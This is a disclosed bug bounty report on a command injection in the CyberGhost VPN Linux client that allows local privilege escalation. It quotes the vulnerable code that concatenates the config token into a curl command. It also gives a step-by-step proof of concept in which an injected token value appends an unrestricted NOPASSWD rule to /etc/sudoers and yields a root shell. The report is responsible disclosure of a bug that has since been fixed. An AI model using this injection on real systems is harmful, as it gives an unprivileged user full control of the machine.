Linux client - command injection - local privilege escalation

Disclosed by
mmmdspl
  • Program CyberGhost
  • Disclosed date about 1 year ago
  • Points 40
  • Priority P1 Bugcrowd's VRT priority rating
  • Status Resolved This vulnerability has been accepted and fixed
Summary by CyberGhost

While mmmdspl initially submitted this vulnerability through our Vulnerability Disclosure Program, we immediately recognized the value of his research into our application and wanted to ensure he was rewarded for it, so we asked him to submit to our bug bounty program. We greatly appreciate his efforts to identify this local privilege escalation weakness in our Linux client application.

Summary by mmmdspl

Linux client has a command injection vulnerability. This vulnerability could be successfully exploited to escalate privileges to root in case the user has limited privileges and is allowed to run only cyberghostvpn command with sudo.

Report details

  • Submitted

  • Target Location

    CyberGhost Linux application

  • Target category

    Other

  • VRT

    Client-Side Injection

  • Priority

    P1
  • Bug URL
    Empty
  • Description

    I am resubmitting the report according to Brenton's advice - https://bugcrowd.com/submissions/e9a427ffe2dad4b409893bbd366c461ca658813a7f8fc6db9d47b36ab069f049

    Original report:

    Hello CyberGhost Team,

    I discovered that the Linux client has a command injection vulnerability. This vulnerability could be successfully exploited to escalate privileges to root in case the user has limited privileges and is allowed to run only cyberghostvpn command with sudo.

    The injection is located in wireguard-related code cyberghostvpn_ubuntu_18.04_extracted/PYZ-00.pyz_extracted/services/wireguard.py

        def __addKey(self, publicKey, hostname):
        token = self.getConfig('device', 'token')
        secret = self.getConfig('device', 'secret')
        command = 'curl [...] --user "' + token + ':' + secret + '" --data-urlencode "pubkey=' + publicKey + '" "https://' + hostname + ':1337/addKey"'
        proc = Helpers().executeCommand(command)

    Values token and secret come from user-controllable configuration file. These values could be modified to inject any command which will be executed when establishing new wireguard connection. In the result, a user that is allowed to connect to VPN, may escalate to root.

    PoC:
    1) Prerequisite - user is allowed to run only cyberghostvpn with sudo.

    $ sudo -l

User user may run the following commands on myhost:
    (ALL) /usr/bin/cyberghostvpn

$ sudo su
Sorry, user user is not allowed to execute '/usr/bin/su' as root on myhost.

    2) User edits its own configuration file to provide payload in "token" value

    $ cd ~/.cyberghostvpn
$ cp config.ini config.ini.bak

    $ cat config.ini
[account]
username = [redcated]
password = [redacted]

[device]
name = Linux APP
token = aaaa" --help;echo 'temp ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers;"
secret = bbbb

    3) Connect to the VPN (now payload will be executed with root privileges). Payload modifies /etc/sudoers allowing the user to execute any command as root.

    $ sudo cyberghostvpn --wireguard --connect --country-code CZ
Prepare Wireguard connection ...
Select server ... prague-s401-i16
Connecting ... 
WIREGUARD error: cannot add key!

    4) Switch to root

    $ sudo -l

User user may run the following commands on myhost:
    (ALL) /usr/bin/cyberghostvpn
    (ALL) NOPASSWD: ALL

$ sudo su
# whoami
root
Activity